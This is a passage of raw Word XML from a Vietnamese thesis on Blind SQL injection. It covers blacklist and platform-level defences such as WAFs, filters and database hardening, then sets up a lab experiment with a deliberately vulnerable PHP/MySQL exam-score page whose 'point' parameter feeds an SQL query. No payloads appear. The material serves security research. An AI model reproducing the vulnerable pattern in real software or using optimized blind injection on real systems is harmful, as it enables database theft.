          <w:p w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidRDefault="00E921F1" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E921F1">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidRDefault="00E921F1" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E921F1">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E921F1" w:rsidRDefault="00FF7CE2" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F92F00">
        <w:t xml:space="preserve">Kỹ thuật blacklist có nhược điểm là chỉ có thể chặn các mẫu đã biết, đối với các mẫu chưa biết thì không thể chặn được. điều này tạo ra nguy cơ kẻ tấn công sử dụng các kỹ thuật, từ khóa câu lệnh khác để vượt qua. </w:t>
      </w:r>
      <w:r>
        <w:t>Ngoài ra, việc xây dựng hàm lọc, sử dụng các hàm so sánh chuẩn xác cũng quyết định chất lượng việc lọc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF7CE2" w:rsidRDefault="00FF7CE2" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Tuy nhiên, phương pháp blacklist này có lợi thế không phụ thuộc nhiều vào ứng dụng như phương pháp whitelist. Đa số tập mẫu nhận diện tấn công là phổ biến, được công bố rộng rãi. Việc triển khai lọc này có thể triển khai ở mức ứng dụng, hoặc lớp hệ thống như sử dụng các tường lửa mức ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B479CD" w:rsidRDefault="00B479CD" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc459822519"/>
      <w:r w:rsidRPr="00B479CD">
        <w:t>Sử dụng kỹ thuật phòng thủ mức Platform level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w:rsidR="00B479CD" w:rsidRDefault="00C3317E" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Trong các phần trên, luận văn trình bày các phương pháp phòng thủ chính ở mức code-level. Trong nhiều trường hợp, việc triển khai giải pháp khắc phục chưa thể thực hiện ngay, cần một giải pháp tạm thời. Hơn nữa, việc phòng thủ cần thực hiện đảm bảo “Phòng thủ theo chiều sâu”. Do đó, cần thêm các hướng tiếp cận mức nền tảng. ở mức độ nền tảng, việc phòng chống SQL injection gồm các phương pháp chính sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C3317E" w:rsidRDefault="00DE7D2F" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE7D2F">
        <w:t>Runtime Protection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE7D2F" w:rsidRDefault="00DE7D2F" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Cấu hình bảo mật máy chủ CSDL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF6183" w:rsidRDefault="00AF6183" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Triển khai các giải pháp an toàn khác.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF6183" w:rsidRDefault="00060E03" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00060E03">
        <w:t>Runtime protection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> là bộ các giải pháp có thể triển khai để ngăn chặn, giảm thiểu tấn công SQL injection mức hệ thố</w:t>
      </w:r>
      <w:r w:rsidR="00B00EED">
        <w:t xml:space="preserve">ng. Các giải pháp này được triển </w:t>
      </w:r>
      <w:r w:rsidR="00B00EED">
        <w:lastRenderedPageBreak/>
        <w:t>khai, tham gia vào quá trình hoạt động của ứng dụng (runtime), trực tiếp bảo vệ ứng dụng khi đang hoạt động. Các dạng của loại hình này như:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B00EED" w:rsidRDefault="004D1E53" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="004D1E53">
        <w:t>Web Application Firewalls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: tường lửa mức ứng dụng, đứng trước và chặn lọc, giám sát các dấu hiệu tấn công mức ứng dụng. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D1E53" w:rsidRDefault="004D1E53" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="004D1E53">
        <w:t>Intercepting Filters</w:t>
      </w:r>
      <w:r>
        <w:t>: Các thành phần chặn lọc gói tin http, tiền xử lý trước khi đưa vào ứng dụng. Thông thườ</w:t>
      </w:r>
      <w:r w:rsidR="005B4A41">
        <w:t xml:space="preserve">ng là web server filter như </w:t>
      </w:r>
      <w:r w:rsidR="005B4A41" w:rsidRPr="005B4A41">
        <w:t>UrlScan</w:t>
      </w:r>
      <w:r w:rsidR="005B4A41">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="005B4A41" w:rsidRPr="005B4A41">
        <w:t>WebKnight</w:t>
      </w:r>
      <w:r w:rsidR="005B4A41">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313D3F" w:rsidRDefault="006D6505" w:rsidP="00313D3F">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E97323C" wp14:editId="796EF3EC">
            <wp:extent cx="5972175" cy="2249261"/>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72175" cy="2249261"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6505" w:rsidRPr="00313D3F" w:rsidRDefault="00313D3F" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc459819451"/>
      <w:r w:rsidRPr="00313D3F">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="00313D3F">
        <w:t>: Mô hình hoạt động của Intercepting Filter</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w:rsidR="006D6505" w:rsidRPr="00B479CD" w:rsidRDefault="006D6505" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C94B63">
        <w:t>Cấu hình bảo mật máy chủ CSDL, giúp hạn chế, giới hạn quyền thực thi. Trong trường hợp ứng dụng mắc lỗi SQL injection, các tấn công chỉ xảy ra trên bảng/CSDL được cấp phát, không thể leo thang, nâng quyền sang các CSDL khác, cũng như lợi dụng để chiếm quyền máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765278" w:rsidRPr="00765278" w:rsidRDefault="00765278" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Một vấn đề cần chú ý đó là, các nhà phát triển, quản trị không nên xem xét riêng lẻ từng phương pháp, mà cần phải xem xét một cách tổng thể</w:t>
      </w:r>
      <w:r w:rsidR="00305F5A">
        <w:t xml:space="preserve">, như là một phần của chiến lược “Phòng thủ theo chiều sâu”. </w:t>
      </w:r>
      <w:r w:rsidR="00BF78DE">
        <w:t>Không có một phương pháp, kỹ thuật nào có thể triệt để xử lý được nguy cơ mất an toàn thông tin. Đó phải là sự kết hợp của nhiều hơn một phương pháp, kỹ thuật.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc459822520"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Xây dựng thực nghiệm và đánh giá kết quả tố</w:t>
      </w:r>
      <w:r w:rsidR="00673CE2">
        <w:t>i ưu hóa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w:rsidR="00BA74A3" w:rsidRDefault="00BA74A3" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong phần này</w:t>
      </w:r>
      <w:r w:rsidR="004F5035">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, luận văn sẽ trình bày về thử nghiệm phương pháp tối ưu dựa trên phân tích thứ tự nội dung trả về so với các phương pháp khác trong tấn </w:t>
      </w:r>
      <w:r w:rsidR="004F5035">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>công Blind SQL injection. Tiêu chí để đánh giá sự tối ưu dựa trên: Số lượng yêu cầu gửi lên, và thời gian sử dụng để tấn công (Thời gian để lấy 1 ký tự, hoặc một chuỗi ký tự).</w:t>
      </w:r>
      <w:r w:rsidR="00673CE2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB36A9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Môi trường t</w:t>
      </w:r>
      <w:r w:rsidR="00673CE2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>hực nghiệm cần xây dựng các thành phần chính:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00673CE2" w:rsidRPr="00673CE2" w:rsidRDefault="00673CE2" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00673CE2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Môi trường ứng dụng web mắc lỗi Blind SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00673CE2" w:rsidRPr="00673CE2" w:rsidRDefault="00673CE2" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00673CE2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Mã tấn công mô phỏng các thuật toán</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00673CE2" w:rsidRPr="00673CE2" w:rsidRDefault="00673CE2" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00673CE2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Công cụ thu thập các kết quả, tiêu chí để đánh giá tối ưu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00673CE2" w:rsidRDefault="00673CE2" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc458409309"/>
      <w:bookmarkStart w:id="105" w:name="_Toc458409379"/>
      <w:bookmarkStart w:id="106" w:name="_Toc458433505"/>
      <w:bookmarkStart w:id="107" w:name="_Toc459373922"/>
      <w:bookmarkStart w:id="108" w:name="_Toc459373982"/>
      <w:bookmarkStart w:id="109" w:name="_Toc459374355"/>
      <w:bookmarkStart w:id="110" w:name="_Toc459822521"/>
      <w:bookmarkEnd w:id="104"/>
      <w:bookmarkEnd w:id="105"/>
      <w:bookmarkEnd w:id="106"/>
      <w:bookmarkEnd w:id="107"/>
      <w:bookmarkEnd w:id="108"/>
      <w:bookmarkEnd w:id="109"/>
      <w:r>
        <w:t>Xây dựng</w:t>
      </w:r>
      <w:r w:rsidR="007522E7">
        <w:t xml:space="preserve"> mô hình tấn công và</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> môi trường </w:t>
      </w:r>
      <w:r w:rsidR="007B258A">
        <w:t>thực nghiệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
    </w:p>
    <w:p w:rsidR="00B40E52" w:rsidRDefault="00B40E52" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Mô hình tấn công mà luận văn sử dụng để kiểm thử khả năng tối ưu hóa gồm các thành phần sau đây:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B40E52" w:rsidRDefault="00B40E52" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>01 máy chủ Web Server: máy chủ cài đặt WebServer và máy chủ CSDL. Trên máy chủ WebServer sẽ triển khai 01 ứng dụng mắc lỗ hổng bảo mật Blind SQL injection. Đây chính là mục tiêu của các cuộc tấn công trong thử nghiệm.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00385BFD" w:rsidRDefault="00385BFD" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>01 máy chủ CSDL: máy chủ cài đặt hệ quản trị CSDL, cung cấp dịch vụ CSDL cho máy chủ Web truy vấn. Kẻ tấn công không thể truy cập trực tiếp vào máy chủ CSDL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B40E52" w:rsidRDefault="00B40E52" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>01 máy tính PC: Đây là máy tính của kẻ tấn công. Từ máy tính này, kẻ tấn công thực hiện truy cập đến ứng dụng</w:t>
      </w:r>
      <w:r w:rsidR="00385BFD">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên máy chủ Web Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, sử dụng các kỹ thuật để tấn công và tối ưu hóa Blind SQL injection. Trên máy tính này cũng thực các phép đo để lấy ra kết quả nhằm thực nghiệm lại kết quả tối ưu hóa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B40E52" w:rsidRDefault="00B40E52" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cụ thể, mô hình tấn công của thực nghiệm sẽ như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000512EB" w:rsidRDefault="009739B7" w:rsidP="000512EB">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3090938E" wp14:editId="35797AF0">
            <wp:extent cx="5760720" cy="1286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 (1).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId48" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="38172"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="1286189"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009739B7" w:rsidRDefault="000512EB" w:rsidP="000512EB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="_Toc459819452"/>
      <w:r>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Mô hình triển khai tấn công Blind SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w:rsidR="000512EB" w:rsidRDefault="000512EB" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Bước 1: Kẻ tấn công gửi mã tấn công Blind SQL injection đến máy chủ. Trên máy tính kẻ tấn công bắt đầu thực hiện các bộ đếm (số request gửi lên, thời gian).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000512EB" w:rsidRDefault="000512EB" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 2: WebServer tiếp nhận yêu cầu, chuyển thành câu truy vấn SQL chuyển vào máy chủ CSDL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000512EB" w:rsidRDefault="000512EB" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 3: Máy chủ CSDL thực hiện truy vấn, trả về WebServer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000512EB" w:rsidRDefault="000512EB" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 4: WebServer nhận kết quả từ máy chủ CSDL, sinh mã HTML trả về cho kẻ tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000512EB" w:rsidRPr="000512EB" w:rsidRDefault="000512EB" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 5: Thực hiện phân tích kết quả trả về. Trường hợp cần thực hiện gửi th</w:t>
      </w:r>
      <w:r w:rsidR="00F86F13">
        <w:t>ê</w:t>
      </w:r>
      <w:r>
        <w:t>m yêu cầu sẽ tiếp tục gửi (quay lại bước 1). Nếu đã hoàn thành trích xuất thông tin sẽ dừng bộ đếm, hiển thị kết quả.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00673CE2" w:rsidRDefault="00F54E50" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiếp theo, luận văn sẽ xây dựng </w:t>
      </w:r>
      <w:r w:rsidR="00673CE2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>môi trường giả lập</w:t>
      </w:r>
      <w:r w:rsidR="00973F77">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> một ứng dụng web mắc lỗi Blind SQL injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> để triển khai trên máy chủ WebServer</w:t>
      </w:r>
      <w:r w:rsidR="00673CE2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00973F77">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Luận văn sử dụng ngôn ngữ lập trình là PHP và hệ quản trị CSDL là MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00673CE2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00973F77">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>vì đây là ngôn ngữ lập trình, cũng như hệ quản trị CSDL phổ biến trên thế giới.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5CC1" w:rsidRDefault="00D655B3" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Ứ</w:t>
      </w:r>
      <w:r w:rsidR="00973F77">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ng dụng mô phỏng là một trang web, có chức năng tra </w:t>
      </w:r>
      <w:r w:rsidR="00DD5CC1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>xem</w:t>
      </w:r>
      <w:r w:rsidR="00973F77">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> điểm thi, người dùng nhập vào </w:t>
      </w:r>
      <w:r w:rsidR="00DD5CC1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">giá trị </w:t>
      </w:r>
      <w:r w:rsidR="00144329">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">điểm mình muốn xem, ứng dụng sẽ truy vấn tìm những thí sinh có điểm thi cao hơn mức điểm đó. </w:t>
      </w:r>
      <w:r w:rsidR="003D3A27">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Trường hợp không nhập mức điểm ứng dụng sẽ hiển thị toàn bộ danh sách thí sinh. </w:t>
      </w:r>
      <w:r w:rsidR="00144329">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Việc nhập mức điểm thông qua tham số point, ứng dụng sẽ lấy tham số này vào truyền vào câu truy vấn SQL. Đây chính là nguyên nhân gây lỗi SQL injection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004046D2" w:rsidRDefault="004046D2" w:rsidP="004046D2">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="106E268D" wp14:editId="6CC9AF22">
            <wp:extent cx="5076825" cy="541020"/>
            <wp:effectExtent l="1905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076825" cy="541020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5CC1" w:rsidRPr="00313D3F" w:rsidRDefault="004046D2" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_Toc459819453"/>
      <w:r w:rsidRPr="00313D3F">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
